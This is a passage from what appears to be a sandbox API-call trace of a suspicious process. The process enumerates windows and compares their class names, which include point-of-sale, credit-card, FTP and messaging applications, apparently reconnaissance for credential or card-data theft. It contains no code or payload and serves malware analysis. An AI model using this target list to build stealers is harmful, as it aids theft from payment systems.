(FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] GetCurrentThreadId () returned 0xe9c [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] GetCurrentThreadId () returned 0xe9c [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.923] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] GetCurrentThreadId () returned 0xe9c [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab600, Size=0x60) returned 0x4a98a0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.924] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] GetCurrentThreadId () returned 0xe9c [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.925] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] GetCurrentThreadId () returned 0xe9c [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7090 [0112.926] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x4bd880 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.926] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] GetCurrentThreadId () returned 0xe9c [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] GetCurrentThreadId () returned 0xe9c [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.927] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.928] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x48ba08 [0112.928] FindWindowW (lpClassName="HTML Application Host Window Class", lpWindowName=0x0) returned 0x301f0 [0112.929] GetClassNameW (in: hWnd=0x301f0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="HTML Application Host Window Class") returned 34 [0112.929] StrCmpW (psz1="HTML Application Host Window Class", psz2="HTML Application Host Window Class") returned 0 [0112.929] GlobalFindAtomW (lpString="HSS") returned 0x0 [0112.929] GetPropW (hWnd=0x301f0, lpString=0x0) returned 0x0 [0112.929] GetWindow (hWnd=0x301f0, uCmd=0x2) returned 0x150268 [0112.929] GetClassNameW (in: hWnd=0x150268, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="HTML Application Host Window Class") returned 34 [0112.929] StrCmpW (psz1="HTML Application Host Window Class", psz2="HTML Application Host Window Class") returned 0 [0112.929] GlobalFindAtomW (lpString="HSS") returned 0x0 [0112.929] GetPropW (hWnd=0x150268, lpString=0x0) returned 0x0 [0112.929] GetWindow (hWnd=0x150268, uCmd=0x2) returned 0x30204 [0112.929] GetClassNameW (in: hWnd=0x30204, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0112.929] StrCmpW (psz1="Internet Explorer_Hidden", psz2="HTML Application Host Window Class") returned 1 [0112.929] GetWindow (hWnd=0x30204, uCmd=0x2) returned 0x10266 [0112.929] GetClassNameW (in: hWnd=0x10266, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.929] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.930] GetWindow (hWnd=0x10266, uCmd=0x2) returned 0x10264 [0112.930] GetClassNameW (in: hWnd=0x10264, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="ridercls") returned 8 [0112.930] StrCmpW (psz1="ridercls", psz2="HTML Application Host Window Class") returned 1 [0112.930] GetWindow (hWnd=0x10264, uCmd=0x2) returned 0x900a6 [0112.930] GetClassNameW (in: hWnd=0x900a6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0112.930] StrCmpW (psz1="DV2ControlHost", psz2="HTML Application Host Window Class") returned -1 [0112.930] GetWindow (hWnd=0x900a6, uCmd=0x2) returned 0x300c6 [0112.930] GetClassNameW (in: hWnd=0x300c6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.930] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.930] GetWindow (hWnd=0x300c6, uCmd=0x2) returned 0x400d0 [0112.930] GetClassNameW (in: hWnd=0x400d0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0112.930] StrCmpW (psz1="AUTHUI.DLL: Shutdown Choices Message Window", psz2="HTML Application Host Window Class") returned -1 [0112.930] GetWindow (hWnd=0x400d0, uCmd=0x2) returned 0x400f0 [0112.930] GetClassNameW (in: hWnd=0x400f0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0112.930] StrCmpW (psz1="_SearchEditBoxFakeWindow", psz2="HTML Application Host Window Class") returned -1 [0112.930] GetWindow (hWnd=0x400f0, uCmd=0x2) returned 0x300de [0112.931] GetClassNameW (in: hWnd=0x300de, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.931] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.931] GetWindow (hWnd=0x300de, uCmd=0x2) returned 0x300ca [0112.931] GetClassNameW (in: hWnd=0x300ca, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.932] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.932] GetWindow (hWnd=0x300ca, uCmd=0x2) returned 0x400c4 [0112.932] GetClassNameW (in: hWnd=0x400c4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0112.932] StrCmpW (psz1="tooltips_class32", psz2="HTML Application Host Window Class") returned 1 [0112.932] GetWindow (hWnd=0x400c4, uCmd=0x2) returned 0x300ac [0112.932] GetClassNameW (in: hWnd=0x300ac, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0112.932] StrCmpW (psz1="Desktop User Picture", psz2="HTML Application Host Window Class") returned -1 [0112.932] GetWindow (hWnd=0x300ac, uCmd=0x2) returned 0x10262 [0112.932] GetClassNameW (in: hWnd=0x10262, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.932] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.932] GetWindow (hWnd=0x10262, uCmd=0x2) returned 0x10260 [0112.933] GetClassNameW (in: hWnd=0x10260, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="scenicclass") returned 11 [0112.933] StrCmpW (psz1="scenicclass", psz2="HTML Application Host Window Class") returned 1 [0112.933] GetWindow (hWnd=0x10260, uCmd=0x2) returned 0x1025e [0112.933] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.933] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.933] GetWindow (hWnd=0x1025e, uCmd=0x2) returned 0x1025c [0112.933] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="map_Enquiries_win") returned 17 [0112.933] StrCmpW (psz1="map_Enquiries_win", psz2="HTML Application Host Window Class") returned 1 [0112.933] GetWindow (hWnd=0x1025c, uCmd=0x2) returned 0x10258 [0112.933] GetClassNameW (in: hWnd=0x10258, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="utg2_win") returned 8 [0112.933] StrCmpW (psz1="utg2_win", psz2="HTML Application Host Window Class") returned 1 [0112.933] GetWindow (hWnd=0x10258, uCmd=0x2) returned 0x1025a [0112.933] GetClassNameW (in: hWnd=0x1025a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.933] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.933] GetWindow (hWnd=0x1025a, uCmd=0x2) returned 0x10254 [0112.934] GetClassNameW (in: hWnd=0x10254, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="spgagentservice_class") returned 21 [0112.934] StrCmpW (psz1="spgagentservice_class", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x10254, uCmd=0x2) returned 0x10256 [0112.934] GetClassNameW (in: hWnd=0x10256, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.934] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x10256, uCmd=0x2) returned 0x10250 [0112.934] GetClassNameW (in: hWnd=0x10250, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="spcwincls") returned 9 [0112.934] StrCmpW (psz1="spcwincls", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x10250, uCmd=0x2) returned 0x10252 [0112.934] GetClassNameW (in: hWnd=0x10252, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.934] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x10252, uCmd=0x2) returned 0x1024c [0112.934] GetClassNameW (in: hWnd=0x1024c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="omniposwnd") returned 10 [0112.934] StrCmpW (psz1="omniposwnd", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x1024c, uCmd=0x2) returned 0x1024e [0112.934] GetClassNameW (in: hWnd=0x1024e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.934] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.934] GetWindow (hWnd=0x1024e, uCmd=0x2) returned 0x10248 [0112.935] GetClassNameW (in: hWnd=0x10248, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="mxslipstream") returned 12 [0112.935] StrCmpW (psz1="mxslipstream", psz2="HTML Application Host Window Class") returned 1 [0112.935] GetWindow (hWnd=0x10248, uCmd=0x2) returned 0x1024a [0112.935] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.935] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.935] GetWindow (hWnd=0x1024a, uCmd=0x2) returned 0x10244 [0112.935] GetClassNameW (in: hWnd=0x10244, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="isspos_win") returned 10 [0112.935] StrCmpW (psz1="isspos_win", psz2="HTML Application Host Window Class") returned 1 [0112.935] GetWindow (hWnd=0x10244, uCmd=0x2) returned 0x10246 [0112.935] GetClassNameW (in: hWnd=0x10246, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.935] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.935] GetWindow (hWnd=0x10246, uCmd=0x2) returned 0x10240 [0112.935] GetClassNameW (in: hWnd=0x10240, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0112.935] StrCmpW (psz1="fpos_class", psz2="HTML Application Host Window Class") returned -1 [0112.935] GetWindow (hWnd=0x10240, uCmd=0x2) returned 0x10242 [0112.935] GetClassNameW (in: hWnd=0x10242, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.935] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.935] GetWindow (hWnd=0x10242, uCmd=0x2) returned 0x1023c [0112.936] GetClassNameW (in: hWnd=0x1023c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="edcsvr_") returned 7 [0112.936] StrCmpW (psz1="edcsvr_", psz2="HTML Application Host Window Class") returned -1 [0112.936] GetWindow (hWnd=0x1023c, uCmd=0x2) returned 0x1023e [0112.936] GetClassNameW (in: hWnd=0x1023e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.936] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.936] GetWindow (hWnd=0x1023e, uCmd=0x2) returned 0x10238 [0112.936] GetClassNameW (in: hWnd=0x10238, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="creditservice_wnd") returned 17 [0112.936] StrCmpW (psz1="creditservice_wnd", psz2="HTML Application Host Window Class") returned -1 [0112.936] GetWindow (hWnd=0x10238, uCmd=0x2) returned 0x1023a [0112.936] GetClassNameW (in: hWnd=0x1023a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.936] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.936] GetWindow (hWnd=0x1023a, uCmd=0x2) returned 0x10234 [0112.936] GetClassNameW (in: hWnd=0x10234, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="centralcreditcard_app") returned 21 [0112.936] StrCmpW (psz1="centralcreditcard_app", psz2="HTML Application Host Window Class") returned -1 [0112.936] GetWindow (hWnd=0x10234, uCmd=0x2) returned 0x10236 [0112.936] GetClassNameW (in: hWnd=0x10236, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.936] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.936] GetWindow (hWnd=0x10236, uCmd=0x2) returned 0x10230 [0112.937] GetClassNameW (in: hWnd=0x10230, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="ccv_serverclass") returned 15 [0112.937] StrCmpW (psz1="ccv_serverclass", psz2="HTML Application Host Window Class") returned -1 [0112.937] GetWindow (hWnd=0x10230, uCmd=0x2) returned 0x10232 [0112.937] GetClassNameW (in: hWnd=0x10232, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.937] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.937] GetWindow (hWnd=0x10232, uCmd=0x2) returned 0x1022c [0112.937] GetClassNameW (in: hWnd=0x1022c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="aldelo_win") returned 10 [0112.937] StrCmpW (psz1="aldelo_win", psz2="HTML Application Host Window Class") returned -1 [0112.937] GetWindow (hWnd=0x1022c, uCmd=0x2) returned 0x1022e [0112.937] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.937] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.937] GetWindow (hWnd=0x1022e, uCmd=0x2) returned 0x10228 [0112.937] GetClassNameW (in: hWnd=0x10228, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="afr38_") returned 6 [0112.937] StrCmpW (psz1="afr38_", psz2="HTML Application Host Window Class") returned -1 [0112.937] GetWindow (hWnd=0x10228, uCmd=0x2) returned 0x1022a [0112.937] GetClassNameW (in: hWnd=0x1022a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.938] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.938] GetWindow (hWnd=0x1022a, uCmd=0x2) returned 0x10224 [0112.938] GetClassNameW (in: hWnd=0x10224, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="accupos") returned 7 [0112.938] StrCmpW (psz1="accupos", psz2="HTML Application Host Window Class") returned -1 [0112.938] GetWindow (hWnd=0x10224, uCmd=0x2) returned 0x10226 [0112.938] GetClassNameW (in: hWnd=0x10226, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.938] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.938] GetWindow (hWnd=0x10226, uCmd=0x2) returned 0x10220 [0112.938] GetClassNameW (in: hWnd=0x10220, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="active-chargewin") returned 16 [0112.938] StrCmpW (psz1="active-chargewin", psz2="HTML Application Host Window Class") returned -1 [0112.938] GetWindow (hWnd=0x10220, uCmd=0x2) returned 0x10222 [0112.938] GetClassNameW (in: hWnd=0x10222, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.938] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.938] GetWindow (hWnd=0x10222, uCmd=0x2) returned 0x1021c [0112.939] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="yahoomessengerapp") returned 17 [0112.939] StrCmpW (psz1="yahoomessengerapp", psz2="HTML Application Host Window Class") returned 1 [0112.939] GetWindow (hWnd=0x1021c, uCmd=0x2) returned 0x1021e [0112.939] GetClassNameW (in: hWnd=0x1021e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.939] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.939] GetWindow (hWnd=0x1021e, uCmd=0x2) returned 0x10218 [0112.939] GetClassNameW (in: hWnd=0x10218, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="winscp_window") returned 13 [0112.939] StrCmpW (psz1="winscp_window", psz2="HTML Application Host Window Class") returned 1 [0112.939] GetWindow (hWnd=0x10218, uCmd=0x2) returned 0x1021a [0112.939] GetClassNameW (in: hWnd=0x1021a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.939] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.939] GetWindow (hWnd=0x1021a, uCmd=0x2) returned 0x10214 [0112.939] GetClassNameW (in: hWnd=0x10214, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="whatsappcls") returned 11 [0112.939] StrCmpW (psz1="whatsappcls", psz2="HTML Application Host Window Class") returned 1 [0112.939] GetWindow (hWnd=0x10214, uCmd=0x2) returned 0x10216 [0112.940] GetClassNameW (in: hWnd=0x10216, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.940] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.940] GetWindow (hWnd=0x10216, uCmd=0x2) returned 0x10210 [0112.940] GetClassNameW (in: hWnd=0x10210, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="webdrive_app") returned 12 [0112.940] StrCmpW (psz1="webdrive_app", psz2="HTML Application Host Window Class") returned 1 [0112.940] GetWindow (hWnd=0x10210, uCmd=0x2) returned 0x10212 [0112.940] GetClassNameW (in: hWnd=0x10212, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.940] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.940] GetWindow (hWnd=0x10212, uCmd=0x2) returned 0x1020c [0112.940] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="trillianapp") returned 11 [0112.940] StrCmpW (psz1="trillianapp", psz2="HTML Application Host Window Class") returned 1 [0112.940] GetWindow (hWnd=0x1020c, uCmd=0x2) returned 0x1020e [0112.940] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.941] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.941] GetWindow (hWnd=0x1020e, uCmd=0x2) returned 0x10208 [0112.941] GetClassNameW (in: hWnd=0x10208, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="totalcmd_cls") returned 12 [0112.941] StrCmpW (psz1="totalcmd_cls", psz2="HTML Application Host Window Class") returned 1 [0112.941] GetWindow (hWnd=0x10208, uCmd=0x2) returned 0x1020a [0112.941] GetClassNameW (in: hWnd=0x1020a, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.941] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.941] GetWindow (hWnd=0x1020a, uCmd=0x2) returned 0x10200 [0112.941] GetClassNameW (in: hWnd=0x10200, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="smartftp_") returned 9 [0112.941] StrCmpW (psz1="smartftp_", psz2="HTML Application Host Window Class") returned 1 [0112.941] GetWindow (hWnd=0x10200, uCmd=0x2) returned 0x10202 [0112.941] GetClassNameW (in: hWnd=0x10202, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.941] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.942] GetWindow (hWnd=0x10202, uCmd=0x2) returned 0x101fc [0112.942] GetClassNameW (in: hWnd=0x101fc, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="skypewindow") returned 11 [0112.942] StrCmpW (psz1="skypewindow", psz2="HTML Application Host Window Class") returned 1 [0112.942] GetWindow (hWnd=0x101fc, uCmd=0x2) returned 0x101fe [0112.942] GetClassNameW (in: hWnd=0x101fe, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.942] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.942] GetWindow (hWnd=0x101fe, uCmd=0x2) returned 0x101f8 [0112.942] GetClassNameW (in: hWnd=0x101f8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="scriptftp_wnd") returned 13 [0112.942] StrCmpW (psz1="scriptftp_wnd", psz2="HTML Application Host Window Class") returned 1 [0112.942] GetWindow (hWnd=0x101f8, uCmd=0x2) returned 0x101fa [0112.942] GetClassNameW (in: hWnd=0x101fa, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.942] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.942] GetWindow (hWnd=0x101fa, uCmd=0x2) returned 0x101f4 [0112.943] GetClassNameW (in: hWnd=0x101f4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="pidginapp") returned 9 [0112.943] StrCmpW (psz1="pidginapp", psz2="HTML Application Host Window Class") returned 1 [0112.943] GetWindow (hWnd=0x101f4, uCmd=0x2) returned 0x101f6 [0112.943] GetClassNameW (in: hWnd=0x101f6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.943] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.943] GetWindow (hWnd=0x101f6, uCmd=0x2) returned 0x101ec [0112.943] GetClassNameW (in: hWnd=0x101ec, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="operamailapp") returned 12 [0112.943] StrCmpW (psz1="operamailapp", psz2="HTML Application Host Window Class") returned 1 [0112.943] GetWindow (hWnd=0x101ec, uCmd=0x2) returned 0x101ee [0112.943] GetClassNameW (in: hWnd=0x101ee, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.943] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.943] GetWindow (hWnd=0x101ee, uCmd=0x2) returned 0x101e8 [0112.943] GetClassNameW (in: hWnd=0x101e8, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="notepadwindow") returned 13 [0112.944] StrCmpW (psz1="notepadwindow", psz2="HTML Application Host Window Class") returned 1 [0112.944] GetWindow (hWnd=0x101e8, uCmd=0x2) returned 0x101ea [0112.944] GetClassNameW (in: hWnd=0x101ea, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.944] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.944] GetWindow (hWnd=0x101ea, uCmd=0x2) returned 0x101e4 [0112.944] GetClassNameW (in: hWnd=0x101e4, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="ncftpwin") returned 8 [0112.944] StrCmpW (psz1="ncftpwin", psz2="HTML Application Host Window Class") returned 1 [0112.944] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x101e6 [0112.944] GetClassNameW (in: hWnd=0x101e6, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.944] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.944] GetWindow (hWnd=0x101e6, uCmd=0x2) returned 0x101e0 [0112.944] GetClassNameW (in: hWnd=0x101e0, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="leechftp_app") returned 12 [0112.945] StrCmpW (psz1="leechftp_app", psz2="HTML Application Host Window Class") returned 1 [0112.945] GetWindow (hWnd=0x101e0, uCmd=0x2) returned 0x101e2 [0112.945] GetClassNameW (in: hWnd=0x101e2, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.945] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.945] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101dc [0112.945] GetClassNameW (in: hWnd=0x101dc, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="icq_class") returned 9 [0112.945] StrCmpW (psz1="icq_class", psz2="HTML Application Host Window Class") returned 1 [0112.945] GetWindow (hWnd=0x101dc, uCmd=0x2) returned 0x101de [0112.945] GetClassNameW (in: hWnd=0x101de, lpClassName=0x22d02c, nMaxCount=260 | out: lpClassName="IME") returned 3 [0112.945] StrCmpW (psz1="IME", psz2="HTML Application Host Window Class") returned 1 [0112.945] GetWindow (hWnd=0x101de, uCmd=0x2) returned 0x101d8 [0112.945] GetClassNameW (in: hWnd=0x101d8, lpClassName=0x22d02c, nMaxCount=260 | out: 